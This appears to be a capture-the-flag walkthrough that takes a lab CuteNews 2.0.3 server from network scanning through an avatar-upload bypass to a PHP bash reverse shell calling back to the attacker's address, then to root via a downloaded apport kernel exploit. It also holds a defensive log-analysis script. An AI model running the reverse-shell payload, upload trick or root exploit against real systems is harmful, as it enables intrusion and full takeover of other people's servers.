Information gathering
1. ARP discovery
Discover live hosts on the local interface.
┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.11.81
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 fc:86:2a:4a:6f:ec Huawei Device Co., Ltd.
192.168.11.15 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.36 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.46 14:de:39:c3:4f:31 Huawei Device Co., Ltd.
192.168.11.22 e0:d0:45:5c:f5:53 Intel Corporate
192.168.11.33 f4:a4:75:fe:6b:2c Intel Corporate
192.168.11.68 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.11.86 00:0c:29:cc:9c:f1 VMware, Inc.
192.168.11.18 3c:e9:f7:c0:ef:c7 Intel Corporate
192.168.11.20 3c:21:9c:fd:7b:6d Intel Corporate
2. netdiscover
netdiscover -r 192.168.11.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
11 Captured ARP Req/Rep packets, from 9 hosts. Total size: 660
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.11.1 fc:86:2a:4a:6f:ec 3 180 Huawei Device Co., Ltd.
192.168.11.36 3c:55:76:dc:ab:f5 1 60 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.22 e0:d0:45:5c:f5:53 1 60 Intel Corporate
192.168.11.33 f4:a4:75:fe:6b:2c 1 60 Intel Corporate
192.168.11.20 3c:21:9c:fd:7b:6d 1 60 Intel Corporate
192.168.11.46 14:de:39:c3:4f:31 1 60 Huawei Device Co., Ltd.
192.168.11.86 00:0c:29:cc:9c:f1 1 60 VMware, Inc.
192.168.11.68 7c:b5:66:a5:f0:a5 1 60 Intel Corporate
192.168.11.69 e6:bf:32:e2:1b:48 1 60 Unknown vendor
3. nmap
Host discovery
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sn 192.168.11.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:27 CST
Nmap scan report for 192.168.11.1
Host is up (0.0092s latency).
MAC Address: FC:86:2A:4A:6F:EC (Huawei Device)
Nmap scan report for 192.168.11.15
Host is up (0.13s latency).
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.20
Host is up (0.12s latency).
MAC Address: 3C:21:9C:FD:7B:6D (Intel Corporate)
Nmap scan report for 192.168.11.22
Host is up (0.12s latency).
MAC Address: E0:D0:45:5C:F5:53 (Intel Corporate)
Nmap scan report for 192.168.11.33
Host is up (0.12s latency).
MAC Address: F4:A4:75:FE:6B:2C (Intel Corporate)
Nmap scan report for 192.168.11.36
Host is up (0.00016s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.46
Host is up (0.024s latency).
MAC Address: 14:DE:39:C3:4F:31 (Huawei Device)
Nmap scan report for 192.168.11.68
Host is up (0.11s latency).
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)
Nmap scan report for 192.168.11.69
Host is up (0.12s latency).
MAC Address: E6:BF:32:E2:1B:48 (Unknown)
Nmap scan report for 192.168.11.86
Host is up (0.00014s latency).
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap scan report for 192.168.11.81
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 0.77 seconds
Port scan
┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.11.86 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:28 CST
Nmap scan report for 192.168.11.86
Host is up (0.0015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
Service and version detection
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p80 192.168.11.86 --min-rate 10000 -oA xx
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:31 CST
Nmap scan report for 192.168.11.86
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
-sC : run the default scripts
-sV : detect service versions
-sT : TCP connect scan
-O : OS detection
-p : specify the port(s)
--min-rate 10000 : send at least 10,000 packets per second
UDP scan
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.11.86 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:29 CST
Nmap scan report for 192.168.11.86
Host is up (0.00023s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
682/udp closed xfr
772/udp closed cycleserv2
9103/udp closed bacula-sd
20518/udp closed unknown
41774/udp closed unknown
49179/udp closed unknown
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Vulnerability scan
┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p80 192.168.11.86 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:34 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.11.86
Host is up (0.00065s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.11.86
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.11.86:80/
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.11.86:80/?register
| Form id: regpassword
| Form action: /index.php?register
|
| Path: http://192.168.11.86:80/?register&lostpass
| Form id:
| Form action: /index.php
|
| Path: http://192.168.11.86:80/index.php
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.11.86:80/index.php?register
| Form id: regpassword
|_ Form action: /index.php?register
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /rss.php: RSS or Atom feed
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 344.99 seconds
4. nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.11.86 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.86
+ Target Hostname: 192.168.11.86
+ Target Port: 80
+ Start Time: 2023-11-27 14:35:16 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: Cookie CUTENEWS_SESSION created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /docs/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8103 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-11-27 14:35:31 (GMT8) (15 seconds)
---------------------------------------------------------------------------
Directory enumeration
1. gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.11.86 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.86
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 301) [Size: 312] [--> http://192.168.11.86/docs/]
/uploads (Status: 301) [Size: 315] [--> http://192.168.11.86/uploads/]
/skins (Status: 301) [Size: 313] [--> http://192.168.11.86/skins/]
/core (Status: 301) [Size: 312] [--> http://192.168.11.86/core/]
/cdata (Status: 301) [Size: 313] [--> http://192.168.11.86/cdata/]
/server-status (Status: 403) [Size: 293]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
2. dirb
└─# cat dirb.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: /root/lianxi/dirb.txt
START_TIME: Mon Nov 27 17:19:21 2023
URL_BASE: http://192.168.11.86/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.11.86/ ----
==> DIRECTORY: http://192.168.11.86/core/
==> DIRECTORY: http://192.168.11.86/docs/
+ http://192.168.11.86/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.11.86/index.php (CODE:200|SIZE:2487)
+ http://192.168.11.86/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.11.86/skins/
==> DIRECTORY: http://192.168.11.86/uploads/
---- Entering directory: http://192.168.11.86/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Nov 27 17:19:25 2023
DOWNLOADED: 4612 - FOUND: 3
3. dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.11.86 -e* -o /root/lianxi/dirsearch.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/lianxi/dirsearch.txt
Error Log: /root/.dirsearch/logs/errors-23-11-27_17-19-56.log
Target: http://192.168.11.86/
[17:19:56] Starting:
[17:19:58] 403 - 285B - /.php3
[17:20:00] 200 - 3KB - /LICENSE.txt
[17:20:00] 200 - 2KB - /README.md
[17:20:12] 301 - 312B - /core -> http://192.168.11.86/core/
[17:20:13] 200 - 1KB - /docs/
[17:20:13] 301 - 312B - /docs -> http://192.168.11.86/docs/
[17:20:14] 200 - 12KB - /example.php
[17:20:14] 200 - 1KB - /favicon.ico
[17:20:17] 200 - 2KB - /index.php
[17:20:17] 200 - 2KB - /index.php/login/
[17:20:24] 200 - 28B - /print.php
[17:20:26] 200 - 105B - /rss.php
[17:20:26] 200 - 5KB - /search.php
[17:20:26] 403 - 293B - /server-status
[17:20:26] 403 - 294B - /server-status/
[17:20:28] 301 - 313B - /skins -> http://192.168.11.86/skins/
[17:20:31] 301 - 315B - /uploads -> http://192.168.11.86/uploads/
[17:20:31] 200 - 743B - /uploads/
Task Completed
4. feroxbuster
feroxbuster -u http://192.168.11.86 -x php -w <wordlist>
whatweb
┌──(root㉿ru)-[~/lianxi]
└─# whatweb http://192.168.11.86/
http://192.168.11.86/ [200 OK]
Apache[2.4.7], Cookies[CUTENEWS_SESSION], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.11.86],
PHP[5.5.9-1ubuntu4.6], PasswordField[password], Script[text/javascript],
Title[Please Login / CuteNews], UncommonHeaders[accept-charset],
X-Frame-Options[sameorigin], X-Powered-By[PHP/5.5.9-1ubuntu4.6]
WEB
1. CMS
![](https://i-blog.csdnimg.cn/blog_migrate/a1dcc9df4f7b911abcfe90032ed72a44.png)
This is clearly a content management system. Since the page gives the CMS name and version, it very likely has known vulnerabilities.
2. searchsploit
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit CuteNews 2.0.3
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload | php/webapps/37474.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
poc
┌──(root㉿ru)-[~/lianxi]
└─# cat 37474.txt
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm T0x!c member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
==========================================================
# Exploit :
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
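From the PoC, the flow is roughly this: first create an account and log in, then use the file upload vulnerability to upload a shell, then start a listener and wait for the reverse shell.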
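Seen from the web server's side, the flow above leaves a recognizable trace: a POST to the personal-options page followed by a successful request for a script under `/uploads/`. The following is an added example, not part of the original post; it assumes Apache combined log format, the log lines are constructed, and the scanner User-Agent list is an assumption based on tool defaults that a client can change.

```python
import re

# Constructed sample in Apache "combined" format (not captured from the lab).
SAMPLE_LOG = """\
192.168.11.81 - - [27/Nov/2023:17:19:22 +0800] "GET /admin HTTP/1.1" 404 450 "-" "gobuster/3.6"
192.168.11.81 - - [27/Nov/2023:17:40:01 +0800] "POST /index.php?register HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
192.168.11.81 - - [27/Nov/2023:17:42:10 +0800] "POST /index.php?mod=main&opt=personal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.11.81 - - [27/Nov/2023:17:42:30 +0800] "GET /uploads/avatar_test_Evil.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.11.22 - - [27/Nov/2023:17:43:00 +0800] "GET /uploads/avatar_alice_me.jpg HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Extensions a mod_php setup may hand to the interpreter, including
# double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.I)
# Assumed default User-Agent substrings of the enumeration tools.
SCANNER_UA = re.compile(r'gobuster|nikto|feroxbuster', re.I)


def analyze(log_text):
    """Return (rule, client_ip, path) tuples for suspicious requests."""
    findings = []
    uploaders = set()  # clients that POSTed to the avatar upload page
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path, status, ua = m.group(
            "ip", "method", "path", "status", "ua")
        base = path.split("?", 1)[0]
        if SCANNER_UA.search(ua):
            findings.append(("scanner-user-agent", ip, path))
        if method == "POST" and "opt=personal" in path:
            uploaders.add(ip)
        # A 2xx answer for a script inside the upload directory means the
        # server stored it and was willing to serve or execute it.
        if (base.startswith("/uploads/") and SCRIPT_EXT.search(base)
                and status.startswith("2")):
            rule = ("script-in-uploads-after-upload" if ip in uploaders
                    else "script-in-uploads")
            findings.append((rule, ip, base))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Any hit on the `script-in-uploads` rules also shows that the upload directory executes scripts at all, which is the setting to remove on the server.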
Reverse shell
1. Payload
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.81/3636 0>&1'"); ?>
2. Upload
![](https://i-blog.csdnimg.cn/blog_migrate/8db0bb76ba85c555a8cc77beb362eac7.png)
Upload succeeded!
3. Reverse shell
Click the uploaded payload while the listener is running.
┌──(root㉿ru)-[~/lianxi]
└─# nc -lvnp 3636
listening on [any] 3636 ...
connect to [192.168.11.81] from (UNKNOWN) [192.168.11.86] 36287
bash: cannot set terminal process group (1184): Inappropriate ioctl for device
bash: no job control in this shell
www-data@simple:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/var/www/html/uploads$ pwd
pwd
/var/www/html/uploads
www-data@simple:/var/www/html/uploads$
Privilege escalation
Kernel privilege escalation
www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/home/bull$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
www-data@simple:/home/bull$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@simple:/home/bull$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/at
/usr/bin/passwd
/bin/fusermount
/bin/su
/bin/ping6
/bin/ping
/bin/mount
/bin/umount
www-data@simple:/home/bull$
www-data@simple:/tmp$ wget http://192.168.11.86:8080/37088.c
wget http://192.168.11.86:8080/37088.c
--2023-11-27 03:12:14-- http://192.168.11.86:8080/37088.c
Connecting to 192.168.11.86:8080... failed: Connection refused.
www-data@simple:/tmp$ wget http://192.168.11.81:8080/37088.c
wget http://192.168.11.81:8080/37088.c
--2023-11-27 03:12:33-- http://192.168.11.81:8080/37088.c
Connecting to 192.168.11.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6027 (5.9K) [text/x-csrc]
Saving to: '37088.c'
0K ..... 100% 1.02G=0s
2023-11-27 03:12:33 (1.02 GB/s) - '37088.c' saved [6027/6027]
www-data@simple:/tmp$ ls -al
ls -al
total 16
drwxrwxrwt 2 root root 4096 Nov 27 03:12 .
drwxr-xr-x 21 root root 4096 Sep 9 2015 ..
-rw-r--r-- 1 www-data www-data 6027 Nov 27 2023 37088.c
www-data@simple:/tmp$ chmod +x 37088.c
chmod +x 37088.c
www-data@simple:/tmp$ gcc 37088.c -o 37088
gcc 37088.c -o 37088
www-data@simple:/tmp$ ls
ls
37088
37088.c
www-data@simple:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 1585
apport stopped, pid = 1586
getting pid 1585
current pid = 1584..2500..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..
** child: current pid = 1585
** child: executing /bin/su
su: must be run from a terminal
sleeping 2s..
checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..
checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
stty: standard input: Inappropriate ioctl for device
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
get flag
# cd /root
# ls
flag.txt
# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
#